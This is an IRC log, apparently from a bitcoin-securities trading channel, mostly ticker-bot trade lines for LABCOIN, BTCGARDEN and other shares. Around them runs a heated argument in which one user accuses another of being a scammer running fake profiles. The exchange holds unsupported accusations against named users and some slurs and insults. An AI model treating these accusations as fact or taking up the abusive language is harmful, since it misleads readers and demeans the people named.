[BTCTC] [LABCOIN] 1748 @ 0.002999 = 5.2423 BTC [+] Aug 01 06:13:27 [HAVELOCK] [SDSTM] 1 @ 0.0089 BTC [+] Aug 01 06:13:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.04 = 0.32 BTC [-] Aug 01 06:13:32 [HAVELOCK] [SDSTM] 1 @ 0.0083001 BTC [-] Aug 01 06:13:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 01 06:13:34 mircea_popescu: go look up fabrizio posting under 'samuel noi' and the vca downstream info Aug 01 06:13:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 01 06:13:35 pizza_deliveri, just got trolled hard an u.o.e.n.o Aug 01 06:13:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 01 06:13:41 [BTCTC] [TAT.ASICMINER] 8 @ 0.04 = 0.32 BTC [-] Aug 01 06:13:45 [BTCTC] [LABCOIN] 10 @ 0.002978 = 0.0298 BTC [-] Aug 01 06:13:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.04 = 0.16 BTC [-] Aug 01 06:13:51 what is wrong with you? Aug 01 06:13:54 [BTCTC] [LABCOIN] 1500 @ 0.003 = 4.5 BTC [+] Aug 01 06:13:58 [BTCTC] [LABCOIN] 2 @ 0.003 = 0.006 BTC [+] Aug 01 06:14:06 ;;google u.o.e.n.o Aug 01 06:14:07 Rocko - UOENO Feat. Rick Ross & Future [Gift Of Gab 2 ... - YouTube: ; Urban Dictionary: uoeno: ; Rocko – U.O.E.N.O Lyrics | Rap Genius: Aug 01 06:14:17 [BTCTC] [LABCOIN] 1262 @ 0.003 = 3.786 BTC [+] Aug 01 06:14:22 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [+] Aug 01 06:14:49 [BTCTC] [LABCOIN] 1500 @ 0.003 = 4.5 BTC [+] Aug 01 06:14:58 mircea_popescu: when you invest in something, you want the price to rise not to fall Aug 01 06:14:58 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 01 06:15:02 [BTCTC] [ASICMINER-PT] 1 @ 4.239 BTC [+] Aug 01 06:15:02 [BTCTC] [LABCOIN] 1200 @ 0.003 = 3.6 BTC [+] Aug 01 06:15:09 regardless of whether or not it's a scam, they undervalued what the market would pay for it.. I bet we'd see the same activity if they'd IPOd at .0015 Aug 01 06:15:13 scams aren't investments, pumps aren't "price rising" and etc. Aug 01 06:15:22 [BTCTC] [LABCOIN] 140 @ 0.002999 = 0.4199 BTC [-] Aug 01 06:15:25 no "market" would pay for anything whatsoever. Aug 01 06:15:25 [BTCTC] [LABCOIN] 829 @ 0.002999 = 2.4862 BTC [-] Aug 01 06:15:32 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [+] Aug 01 06:15:33 [BTCTC] [LABCOIN] 171 @ 0.003 = 0.513 BTC [+] Aug 01 06:15:36 isn't the price irrelevant if it's a scam? Aug 01 06:15:38 stop trying to bring contextual proof, it doesn't work to the people who set the contexts. Aug 01 06:15:41 [BTCTC] [LABCOIN] 200 @ 0.003 = 0.6 BTC [+] Aug 01 06:15:42 [BTCTC] [ASICMINER-PT] 1 @ 4.244 BTC [+] Aug 01 06:15:42 save the shit for reddit. Aug 01 06:15:46 mircea_popescu: have you even covered knc + hashfast Aug 01 06:15:47 [BTCTC] [LABCOIN] 800 @ 0.003 = 2.4 BTC [+] Aug 01 06:15:54 i likely won't even bother. Aug 01 06:15:56 if you cant spot socks there god help you Aug 01 06:16:15 i'm not the universal buster of bubbles. i'm the occasional buster of bubbles. Aug 01 06:16:23 i hope also you understand spend too much time looking for patterns and you pickup false positives Aug 01 06:16:27 see things that arent even there Aug 01 06:16:33 so it coinlab going down now? Aug 01 06:16:34 or up Aug 01 06:16:35 as you've done with me Aug 01 06:16:39 [BTCTC] [LABCOIN] 7396 @ 0.0032 = 23.6672 BTC [+] Aug 01 06:16:41 but anyway, to help you with your research : you're talking with this guy. http://trilema.com/2013/people-bitcoin-is-not-worth-100-dollars-per-stop-buying/ Aug 01 06:16:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 01 06:16:45 [BTCTC] [LABCOIN] 446 @ 0.003275 = 1.4607 BTC [+] Aug 01 06:16:46 the price STILL IS where i say it is. Aug 01 06:16:46 [BTCTC] [LABCOIN] 920 @ 0.003276 = 3.0139 BTC [+] Aug 01 06:16:49 [BTCTC] [LABCOIN] 10 @ 0.003276 = 0.0328 BTC [+] Aug 01 06:16:50 [BTCTC] [LABCOIN] 200 @ 0.003397 = 0.6794 BTC [+] Aug 01 06:16:52 [BTCTC] [LABCOIN] 2250 @ 0.003399 = 7.6478 BTC [+] Aug 01 06:16:55 [BTCTC] [LABCOIN] 2571 @ 0.0035 = 8.9985 BTC [+] Aug 01 06:17:15 mircea_popescu: what about the "n00bs learn...something something...pay for privelage" Aug 01 06:17:26 [BTCTC] [LABCOIN] 170 @ 0.003399 = 0.5778 BTC [-] Aug 01 06:17:32 thestringpuller what, he should do no work on his own ? Aug 01 06:17:37 [HAVELOCK] [HIM] 10 @ 0.133 = 1.33 BTC [+] Aug 01 06:17:43 [BTCTC] [LABCOIN] 1396 @ 0.003399 = 4.745 BTC [-] Aug 01 06:17:54 -_-;; Aug 01 06:18:04 laque_ once burnside is done with the fake bids it'll go exactly where that scamchange is going. Aug 01 06:18:14 [BTCTC] [LABCOIN] 20 @ 0.00335 = 0.067 BTC [-] Aug 01 06:18:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006243 = 0.1561 BTC [+] Aug 01 06:18:18 [BTCTC] [ACTIVEMINING] 50 @ 0.006244 = 0.3122 BTC [+] Aug 01 06:18:18 [BTCTC] [LABCOIN] 3 @ 0.003399 = 0.0102 BTC [+] Aug 01 06:18:29 LABCOIN =? COINLAB? Aug 01 06:18:42 labsnovo Aug 01 06:18:42 [BTCTC] [LABCOIN] 225 @ 0.003399 = 0.7648 BTC [+] Aug 01 06:18:43 HL3 confirmed? Aug 01 06:18:46 [BTCTC] [ASICMINER-PT] 1 @ 4.153 BTC [-] Aug 01 06:18:50 [BTCTC] [LABCOIN] 100 @ 0.003276 = 0.3276 BTC [-] Aug 01 06:18:52 uh ohhhh Aug 01 06:18:52 someone should release an alt coin now called labcoin Aug 01 06:18:55 [BTCTC] [LABCOIN] 23 @ 0.003275 = 0.0753 BTC [-] Aug 01 06:18:56 [BTCTC] [TAT.MINIGAME] 100 @ 0.00027 = 0.027 BTC [-] Aug 01 06:19:00 [BTCTC] [LABCOIN] 1377 @ 0.003101 = 4.2701 BTC [-] Aug 01 06:19:17 haha Aug 01 06:19:24 [BTCTC] [LABCOIN] 200 @ 0.00338 = 0.676 BTC [+] Aug 01 06:19:26 mircea_popescu: if you had some respect, you'd remove my username from your blog and stop making unfounded allegations Aug 01 06:19:31 I don't think burnside put any fake bid. I'm afraid it's all genuine demand. And that's actually far worse. Aug 01 06:19:32 louong inb4 the forum "company" which "We" jhas a "business plan" consisting of someone else packaging the code and launching an altcoin Aug 01 06:19:39 [BTCTC] [LABCOIN] 272 @ 0.003399 = 0.9245 BTC [+] Aug 01 06:19:47 Namworld im pretty sure no 25k btc went into his exchange past week. Aug 01 06:19:59 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [+] Aug 01 06:19:59 [BTCTC] [LABCOIN] 7 @ 0.00345 = 0.0242 BTC [+] Aug 01 06:20:06 a point he's welcome to disprove any time he gets enough addresses together with that sort of incoming. Aug 01 06:20:32 pizza_deliveri i have no respect whatsoever for scammers. pack it. Aug 01 06:20:45 mircea_popescu: what a strange little man you are Aug 01 06:20:46 true that most funds should end up in a secure offline storage and that he should be able to show proof of it. Aug 01 06:20:47 [BTCTC] [LABCOIN] 116 @ 0.00345 = 0.4002 BTC [+] Aug 01 06:20:50 egotistical to boot Aug 01 06:20:58 I've told you already, you got the wrong guy Aug 01 06:21:03 pizza_deliveri you're new here and it shows. this is all 2012 stuff. Aug 01 06:21:06 but your too proud or deluded to admit it Aug 01 06:21:11 [BTCTC] [LABCOIN] 2000 @ 0.0035 = 7 BTC [+] Aug 01 06:21:17 stop doing reruns, do your research be original. Aug 01 06:21:33 the labcoin IPO is fuuuucked Aug 01 06:21:39 [BTCTC] [LABCOIN] 130 @ 0.003499 = 0.4549 BTC [-] Aug 01 06:21:46 [BTCTC] [LABCOIN] 23 @ 0.003499 = 0.0805 BTC [-] Aug 01 06:21:50 [BTCTC] [LABCOIN] 100 @ 0.003499 = 0.3499 BTC [-] Aug 01 06:21:52 [BTCTC] [KENILWORTH] 1 @ 0.001514 BTC [+] Aug 01 06:21:54 mircea_popescu: lol...I was around before you and your fake accounts :) Aug 01 06:21:57 [BTCTC] [LABCOIN] 747 @ 0.003499 = 2.6138 BTC [-] Aug 01 06:22:15 [BTCTC] [LABCOIN] 10 @ 0.003499 = 0.035 BTC [-] Aug 01 06:22:22 [BTCTC] [KENILWORTH] 49 @ 0.001513 = 0.0741 BTC [-] Aug 01 06:22:23 right right. because claims count nao. Aug 01 06:22:26 [BTCTC] [LABCOIN] 100 @ 0.0035 = 0.35 BTC [+] Aug 01 06:22:28 [BTCTC] [LABCOIN] 200 @ 0.003499 = 0.6998 BTC [-] Aug 01 06:22:33 [BTCTC] [LABCOIN] 1 @ 0.003519 BTC [+] Aug 01 06:22:35 [BTCTC] [LABCOIN] 10 @ 0.003519 = 0.0352 BTC [+] Aug 01 06:22:37 [BTCTC] [LABCOIN] 26300 @ 0.003598 = 94.6274 BTC [+] Aug 01 06:22:52 mircea_popescu: you are an idiot, i was around in early 2010 Aug 01 06:22:59 [BTCTC] [LABCOIN] 3 @ 0.003499 = 0.0105 BTC [-] Aug 01 06:23:03 [BTCTC] [TAT.ASICMINER] 47 @ 0.04189 = 1.9688 BTC [+] Aug 01 06:23:04 and you can prove this by... Aug 01 06:23:05 [BTCTC] [LABCOIN] 40 @ 0.003499 = 0.14 BTC [-] Aug 01 06:23:06 before your fake profiles and drama Aug 01 06:23:12 [BTCTC] [LABCOIN] 1107 @ 0.003499 = 3.8734 BTC [-] Aug 01 06:23:16 [BTCTC] [LABCOIN] 200 @ 0.003499 = 0.6998 BTC [-] Aug 01 06:23:23 i hear labcoin is going to 1 satoshi a share Aug 01 06:23:25 [BTCTC] [LABCOIN] 23 @ 0.003499 = 0.0805 BTC [-] Aug 01 06:23:36 lol Aug 01 06:23:36 easy to prove - post a message in your 2010-created forum profile Aug 01 06:23:44 [BTCTC] [LTC-ATF.B2] 2 @ 0.01042 = 0.0208 BTC [+] Aug 01 06:23:44 The old forum was shut down Aug 01 06:23:53 i must admit it's kind of entertaining this. confronted with muchly superior firepower the confused scammor nevertheless charges in his shield of "i'll claim stuff because idiots don't correctly insulate" and his trusty sword of "no u!!!" Aug 01 06:24:02 FlyingLeap nope. forum profiles are shit. Aug 01 06:24:12 mircea_popescu: I'm simply stating you are a weird individual who cannot grasp the truth Aug 01 06:24:14 i can get 2009 ones for whatever, <1 btc each Aug 01 06:24:14 [BTCTC] [LABCOIN] 630 @ 0.003499 = 2.2044 BTC [-] Aug 01 06:24:18 I don't even know what we're yelling about Aug 01 06:24:30 [BTCTC] [LABCOIN] 80 @ 0.003518 = 0.2814 BTC [+] Aug 01 06:24:31 [BTCTC] [TAT.ASICMINER] 45 @ 0.04 = 1.8 BTC [-] Aug 01 06:24:33 [BTCTC] [LABCOIN] 2192 @ 0.003597 = 7.8846 BTC [+] Aug 01 06:24:33 pizza_deliveri , post a web irc log of your current authenticated freenode link from 2010 Aug 01 06:24:33 I was mining before any pools existed Aug 01 06:24:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.04 = 0.08 BTC [-] Aug 01 06:24:37 [BTCTC] [LABCOIN] 2000 @ 0.003598 = 7.196 BTC [+] Aug 01 06:24:40 FlyingLeap now that'd work. Aug 01 06:24:42 [HAVELOCK] [AM100] 100 @ 0.0397 = 3.97 BTC [+] Aug 01 06:24:44 i'm thinking of buying out the company at that point...... i still have 30 bucks left... that should at least get me 51 percent of it so i can control the labchain Aug 01 06:24:55 Wild0wnes what'd you do with it tho. Aug 01 06:24:56 [BTCTC] [LABCOIN] 1000 @ 0.003599 = 3.599 BTC [+] Aug 01 06:25:00 mircea_popescu: hah people sell forum accounts, wow. Aug 01 06:25:01 [BTCTC] [BTCGARDEN] 400 @ 0.01633 = 6.532 BTC Aug 01 06:25:01 and how do you suggest I do that when I'm on macbook purchased in 2013? Aug 01 06:25:12 btcgarden. Aug 01 06:25:17 macbook? Aug 01 06:25:17 i would fill my room with labcoins Aug 01 06:25:17 FlyingLeap it's mostly that the forum has appaling security, there were a number of breaches over the years./ Aug 01 06:25:20 i just bought one! Aug 01 06:25:22 ;-) Aug 01 06:25:26 [BTCTC] [LABCOIN] 1000 @ 0.003649 = 3.649 BTC [+] Aug 01 06:25:26 [BTCTC] [BTCGARDEN] 15 @ 0.01632 = 0.2448 BTC [-] Aug 01 06:25:28 pizza_deliveri: a macbook isn't tied to your freenode account? Aug 01 06:25:38 btcgarden's here, yay Aug 01 06:25:38 [BTCTC] [LABCOIN] 1000 @ 0.003649 = 3.649 BTC [+] Aug 01 06:25:39 [BTCTC] [BTCGARDEN] 30 @ 0.01632 = 0.4896 BTC [-] Aug 01 06:25:42 [BTCTC] [BTCGARDEN] 300 @ 0.01632 = 4.896 BTC [-] Aug 01 06:25:43 [BTCTC] [LABCOIN] 20 @ 0.003698 = 0.074 BTC [+] Aug 01 06:25:46 [BTCTC] [BTCGARDEN] 100 @ 0.01632 = 1.632 BTC [-] Aug 01 06:25:47 [BTCTC] [LABCOIN] 1098 @ 0.003698 = 4.0604 BTC [+] Aug 01 06:25:49 [BTCTC] [BTCGARDEN] 5 @ 0.01632 = 0.0816 BTC [-] Aug 01 06:25:53 ;;estimate Aug 01 06:25:54 Next difficulty estimate | 36677188.1972 based on data since last change | 42322793.5162 based on data for last three days Aug 01 06:25:54 flyingleap: I don't have a freenode account Aug 01 06:25:57 macfages will be banned on site Aug 01 06:25:58 19 million dollar valuation go go go Aug 01 06:25:58 ;;bc,stats Aug 01 06:26:01 Current Blocks: 249554 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 429 blocks | Next Difficulty In About: 2 days, 4 hours, and 0 seconds | Next Difficulty Estimate: 36677188.1972 | Estimated Percent Change: 17.34087 Aug 01 06:26:02 [BTCTC] [LABCOIN] 7 @ 0.00345 = 0.0242 BTC [-] Aug 01 06:26:03 [BTCTC] [BTCGARDEN] 60 @ 0.0163 = 0.978 BTC [-] Aug 01 06:26:08 [BTCTC] [BTCGARDEN] 5 @ 0.0163 = 0.0815 BTC [-] Aug 01 06:26:10 pizza_deliveri dude i don't care how you'd do whatever. my being here since 2011 is easily verifiable matter of record. Aug 01 06:26:18 ;;genhash 1000 Aug 01 06:26:19 Error: "genhash" is not a valid command. Aug 01 06:26:19 I was around BEFORE 2011 Aug 01 06:26:19 the verification of your claims is YOUR problem Aug 01 06:26:24 ;;genrate 1000 Aug 01 06:26:25 The expected generation output, at 1000.0 Mhps, given difficulty of 31256960.7278, is 0.0160894247144 BTC per day and 0.000670392696434 BTC per hour. Aug 01 06:26:27 stop trying to pass a claim for a fact. Aug 01 06:26:27 you weird fucker Aug 01 06:26:33 [BTCTC] [BTCGARDEN] 200 @ 0.0163 = 3.26 BTC [-] Aug 01 06:26:35 I've told you already....you got the wrong damn guy Aug 01 06:26:38 [BTCTC] [LABCOIN] 3000 @ 0.003155 = 9.465 BTC [-] Aug 01 06:26:38 again. Aug 01 06:26:39 what the hell is wrong with you Aug 01 06:26:39 [BTCTC] [BTCGARDEN] 2 @ 0.0163 = 0.0326 BTC [-] Aug 01 06:26:40 [BTCTC] [BTCGARDEN] 10 @ 0.0162 = 0.162 BTC [-] Aug 01 06:26:41 woah garden going Aug 01 06:26:41 [BTCTC] [LABCOIN] 100 @ 0.00315 = 0.315 BTC [-] Aug 01 06:26:46 I was here BEFORE you Aug 01 06:26:49 lol Aug 01 06:26:55 no. you claim to have been here before X arbitrary date. Aug 01 06:26:56 and unlike you i don't play weird games like a woman Aug 01 06:27:01 [BTCTC] [BTCGARDEN] 1 @ 0.0162 BTC [-] Aug 01 06:27:01 sigh Aug 01 06:27:02 [BTCTC] [LABCOIN] 6273 @ 0.00315 = 19.76 BTC [-] Aug 01 06:27:04 did btct lose the plot or something? Aug 01 06:27:05 i don't make false profiles pretending to be a woman Aug 01 06:27:13 [BTCTC] [LABCOIN] 437 @ 0.003399 = 1.4854 BTC [+] Aug 01 06:27:13 I don't plaster my MUG all over blogs Aug 01 06:27:14 [BTCTC] [BTCGARDEN] 120 @ 0.0162 = 1.944 BTC [-] Aug 01 06:27:15 pizza_deliveri: the girl is real dude Aug 01 06:27:17 [BTCTC] [BTCGARDEN] 200 @ 0.0161 = 3.22 BTC [-] Aug 01 06:27:18 [BTCTC] [LABCOIN] 1385 @ 0.003399 = 4.7076 BTC [+] Aug 01 06:27:20 so what the hell is your game???? Aug 01 06:27:21 [BTCTC] [BTCGARDEN] 1000 @ 0.0161 = 16.1 BTC [-] Aug 01 06:27:23 [BTCTC] [TAT.ASICMINER] 16 @ 0.04189 = 0.6702 BTC [+] Aug 01 06:27:24 [BTCTC] [BTCGARDEN] 34 @ 0.0161 = 0.5474 BTC [-] Aug 01 06:27:26 [BTCTC] [BTCGARDEN] 1 @ 0.0161 BTC [-] Aug 01 06:27:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.0419 = 0.2514 BTC [+] Aug 01 06:27:28 pizza_deliveri well you couldn't afford to. seeing how scammers kinda need to be able to go buy milk Aug 01 06:27:30 [BTCTC] [BTCGARDEN] 100 @ 0.0161 = 1.61 BTC [-] Aug 01 06:27:31 i hear the first pizza was bought with 10000 labcoins..... soon that pizza will be worth 18 cents Aug 01 06:27:33 [BTCTC] [BTCGARDEN] 61 @ 0.0161 = 0.9821 BTC [-] Aug 01 06:27:35 [BTCTC] [BTCGARDEN] 200 @ 0.0161 = 3.22 BTC [-] Aug 01 06:27:37 [BTCTC] [BTCGARDEN] 10000 @ 0.01603 = 160.3 BTC [-] Aug 01 06:27:41 buy milk are you mad? Aug 01 06:27:48 lol wild0wnes Aug 01 06:27:54 what is your game, i don't even understand what your trying to do Aug 01 06:28:02 [BTCTC] [BTCGARDEN] 500 @ 0.01603 = 8.015 BTC [-] Aug 01 06:28:02 sad. Aug 01 06:28:02 [BTCTC] [LABCOIN] 46 @ 0.003151 = 0.1449 BTC [-] Aug 01 06:28:04 I've just let you know you've listed my username on your blog Aug 01 06:28:09 [HAVELOCK] [AM100] 2 @ 0.039 = 0.078 BTC [-] Aug 01 06:28:11 [HAVELOCK] [AM100] 1 @ 0.039 BTC [-] Aug 01 06:28:14 [BTCTC] [BTCGARDEN] 5000 @ 0.01602 = 80.1 BTC [-] Aug 01 06:28:19 [BTCTC] [BTCGARDEN] 800 @ 0.01602 = 12.816 BTC [-] Aug 01 06:28:20 yeah ywah, rehash. sure. that's how it works. Aug 01 06:28:20 [BTCTC] [LABCOIN] 77 @ 0.0034 = 0.2618 BTC [+] Aug 01 06:28:21 [BTCTC] [BTCGARDEN] 1000 @ 0.01601 = 16.01 BTC [-] Aug 01 06:28:23 [BTCTC] [LABCOIN] 680 @ 0.0034 = 2.312 BTC [+] Aug 01 06:28:25 obviously you got a bit too happy with whatever 'algo' you are looking at to detect socks Aug 01 06:28:26 [BTCTC] [BTCGARDEN] 25 @ 0.01601 = 0.4003 BTC [-] Aug 01 06:28:28 [BTCTC] [LABCOIN] 100 @ 0.003151 = 0.3151 BTC [-] Aug 01 06:28:28 listen, you're sorely unqualified to be participating in all this. Aug 01 06:28:30 [BTCTC] [BTCGARDEN] 45 @ 0.01601 = 0.7205 BTC [-] Aug 01 06:28:31 bit too paranoid for your own good Aug 01 06:28:31 [BTCTC] [BTCGARDEN] 800 @ 0.01601 = 12.808 BTC [-] Aug 01 06:28:33 [BTCTC] [BTCGARDEN] 200 @ 0.01601 = 3.202 BTC [-] Aug 01 06:28:35 [BTCTC] [BTCGARDEN] 315 @ 0.01601 = 5.0432 BTC [-] Aug 01 06:28:39 i get it, it's shocking, you thought everyone's a redditard. well... not rly, not here. Aug 01 06:28:39 [BTCTC] [BTCGARDEN] 600 @ 0.01601 = 9.606 BTC [-] Aug 01 06:28:41 [BTCTC] [BTCGARDEN] 31 @ 0.01601 = 0.4963 BTC [-] Aug 01 06:28:41 now move along Aug 01 06:28:42 [BTCTC] [LABCOIN] 100 @ 0.00349 = 0.349 BTC [+] Aug 01 06:28:44 [BTCTC] [BTCGARDEN] 200 @ 0.01601 = 3.202 BTC [-] Aug 01 06:28:46 [BTCTC] [BTCGARDEN] 100 @ 0.01601 = 1.601 BTC [-] Aug 01 06:28:48 [BTCTC] [BTCGARDEN] 500 @ 0.01601 = 8.005 BTC [-] Aug 01 06:28:49 mircea_popescu: redditard,,, you weirdo Aug 01 06:28:50 [BTCTC] [BTCGARDEN] 4000 @ 0.01601 = 64.04 BTC [-] Aug 01 06:28:50 [BTCTC] [BTCGARDEN] 10000 @ 0.01601 = 160.1 BTC [-] Aug 01 06:28:51 [BTCTC] [BTCGARDEN] 50 @ 0.01601 = 0.8005 BTC [-] Aug 01 06:28:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006398 = 0.16 BTC [+] Aug 01 06:28:54 [BTCTC] [BTCGARDEN] 850 @ 0.01601 = 13.6085 BTC [-] Aug 01 06:28:56 [BTCTC] [ACTIVEMINING] 207 @ 0.006399 = 1.3246 BTC [+] Aug 01 06:28:57 [BTCTC] [BTCGARDEN] 4000 @ 0.01601 = 64.04 BTC [-] Aug 01 06:28:58 [BTCTC] [LABCOIN] 3 @ 0.0034 = 0.0102 BTC [-] Aug 01 06:29:01 [BTCTC] [ACTIVEMINING] 25 @ 0.006399 = 0.16 BTC [+] Aug 01 06:29:02 [BTCTC] [BTCGARDEN] 125 @ 0.01601 = 2.0013 BTC [-] Aug 01 06:29:04 [BTCTC] [BTCGARDEN] 600 @ 0.01601 = 9.606 BTC [-] Aug 01 06:29:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006399 = 0.16 BTC [+] Aug 01 06:29:09 [BTCTC] [BTCGARDEN] 5900 @ 0.01601 = 94.459 BTC [-] Aug 01 06:29:10 mircea_popescu: now I finally understand the problems others had with you Aug 01 06:29:11 [BTCTC] [BTCGARDEN] 10 @ 0.01601 = 0.1601 BTC [-] Aug 01 06:29:13 Namworld add whatever 20k for "btc garden". it adds up fast. Aug 01 06:29:13 [BTCTC] [BTCGARDEN] 130 @ 0.01601 = 2.0813 BTC [-] Aug 01 06:29:15 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:29:17 [BTCTC] [BTCGARDEN] 8000 @ 0.016 = 128 BTC [-] Aug 01 06:29:20 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [-] Aug 01 06:29:23 [BTCTC] [BTCGARDEN] 950 @ 0.016 = 15.2 BTC [-] Aug 01 06:29:25 pizza_deliveri yeah. they were trying to scam and dammit!!! Aug 01 06:29:25 [BTCTC] [BTCGARDEN] 38 @ 0.016 = 0.608 BTC [-] Aug 01 06:29:27 [BTCTC] [LABCOIN] 100 @ 0.00316 = 0.316 BTC [-] Aug 01 06:29:28 oh jesus both tanking Aug 01 06:29:29 [BTCTC] [BTCGARDEN] 8108 @ 0.016 = 129.728 BTC [-] Aug 01 06:29:30 stereotyping redditors is... perfectly logical Aug 01 06:29:30 [BTCTC] [LABCOIN] 200 @ 0.003155 = 0.631 BTC [-] Aug 01 06:29:31 [BTCTC] [BTCGARDEN] 1350 @ 0.016 = 21.6 BTC [-] Aug 01 06:29:32 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [-] Aug 01 06:29:33 abort Aug 01 06:29:34 [BTCTC] [LABCOIN] 1664 @ 0.003152 = 5.2449 BTC [-] Aug 01 06:29:37 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:29:39 [BTCTC] [LABCOIN] 297 @ 0.0034 = 1.0098 BTC [+] Aug 01 06:29:39 btcgarden bids are getting filled normally Aug 01 06:29:41 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [-] Aug 01 06:29:43 mircea_popescu: everyone said you are strange and conjure up conspiracy theories out of nowehre...looks like there's no smoke without fire Aug 01 06:29:44 [BTCTC] [ASICMINER-PT] 1 @ 4.156 BTC [-] Aug 01 06:29:53 FlyingLeap it sure as hell is comfortable. Aug 01 06:29:55 [BTCTC] [LABCOIN] 102 @ 0.003485 = 0.3555 BTC [+] Aug 01 06:29:59 [BTCTC] [BTCGARDEN] 445 @ 0.01601 = 7.1245 BTC [+] Aug 01 06:29:59 BTCGARDEN IPOing Aug 01 06:30:02 [BTCTC] [BTCGARDEN] 750 @ 0.016 = 12 BTC [-] Aug 01 06:30:09 Would you look at at. Aug 01 06:30:11 pizza_deliveri pointing out you can't back up your claims is not a conspiracy theory. Aug 01 06:30:19 first ask up on btcg Aug 01 06:30:23 trying to misrepresent the situation however is quite what scammers do. Aug 01 06:30:28 imircea_popescu: f you had an ounce of integrity: after I've explained to you that yo've got the wrong name, you'd just delete it and move on with whatever 'investigation' next Aug 01 06:30:31 reading reddit hurts, so no sarcasm intended Aug 01 06:30:31 [BTCTC] [LABCOIN] 30 @ 0.003485 = 0.1046 BTC [+] Aug 01 06:30:32 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [-] Aug 01 06:30:35 pizza_deliveri except you lied. Aug 01 06:30:36 [BTCTC] [BTCGARDEN] 2276 @ 0.016 = 36.416 BTC [-] Aug 01 06:30:38 [BTCTC] [LABCOIN] 297 @ 0.0034 = 1.0098 BTC [-] Aug 01 06:30:40 [BTCTC] [BTCGARDEN] 31 @ 0.01601 = 0.4963 BTC [+] Aug 01 06:30:41 so what goddamn 'PROOF' do you want Aug 01 06:30:41 [BTCTC] [LABCOIN] 2000 @ 0.003151 = 6.302 BTC [-] Aug 01 06:30:44 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [-] Aug 01 06:30:45 [BTCTC] [LABCOIN] 13727 @ 0.00315 = 43.2401 BTC [-] Aug 01 06:30:48 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:30:49 [BTCTC] [LABCOIN] 50 @ 0.00311 = 0.1555 BTC [-] Aug 01 06:30:50 mircea_popescu: lied how exactly? Aug 01 06:30:51 [BTCTC] [BTCGARDEN] 70 @ 0.01601 = 1.1207 BTC [+] Aug 01 06:30:53 [BTCTC] [LABCOIN] 3926 @ 0.0031 = 12.1706 BTC [-] Aug 01 06:30:56 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [-] Aug 01 06:30:58 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [-] Aug 01 06:30:59 if you were "around" in 2010, what freenode nick were you? Aug 01 06:31:01 you made a claim you can't back up. re you being here in 2010. Aug 01 06:31:01 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:31:02 how can you 'trip me up' when I've got nothing to hide? Aug 01 06:31:03 [BTCTC] [BTCGARDEN] 140 @ 0.016 = 2.24 BTC [-] Aug 01 06:31:07 [BTCTC] [LABCOIN] 2058 @ 0.0031 = 6.3798 BTC [-] Aug 01 06:31:08 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:31:16 flyingleap: I just use random nicks like 'useraiaiaoo' Aug 01 06:31:20 right. Aug 01 06:31:25 pizza_deliveri: were you in otc in 2010? Aug 01 06:31:26 [BTCTC] [BTCGARDEN] 1859 @ 0.016 = 29.744 BTC [-] Aug 01 06:31:28 [BTCTC] [ASICMINER-PT] 1 @ 4.155 BTC [-] Aug 01 06:31:28 next time get in the wot. Aug 01 06:31:28 [BTCTC] [LABCOIN] 2327 @ 0.003151 = 7.3324 BTC [+] Aug 01 06:31:29 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [-] Aug 01 06:31:31 pizza_deliveri: like in the WoT? Aug 01 06:31:34 [BTCTC] [LABCOIN] 54 @ 0.003399 = 0.1835 BTC [+] Aug 01 06:31:35 [BTCTC] [BTCGARDEN] 35 @ 0.016 = 0.56 BTC [-] Aug 01 06:31:37 I've traded with few guys before Aug 01 06:31:37 [BTCTC] [LABCOIN] 645 @ 0.003589 = 2.3149 BTC [+] Aug 01 06:31:38 10 million x 0.016 = 160,000 BTC instant valuation for BTCGARDEN. Aug 01 06:31:38 [BTCTC] [BTCGARDEN] 725 @ 0.016 = 11.6 BTC [-] Aug 01 06:31:40 we can see when your gpg key was added Aug 01 06:31:40 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:31:42 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:31:44 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:31:46 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:31:47 I hope you're all proud of what you did. Aug 01 06:31:47 [BTCTC] [ASICMINER-PT] 1 @ 4.155 BTC [-] Aug 01 06:31:48 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:31:49 [BTCTC] [ASICMINER-PT] 2 @ 4.153 = 8.306 BTC [-] Aug 01 06:31:51 [BTCTC] [BTCGARDEN] 2700 @ 0.016 = 43.2 BTC [-] Aug 01 06:31:53 [BTCTC] [BTCGARDEN] 300 @ 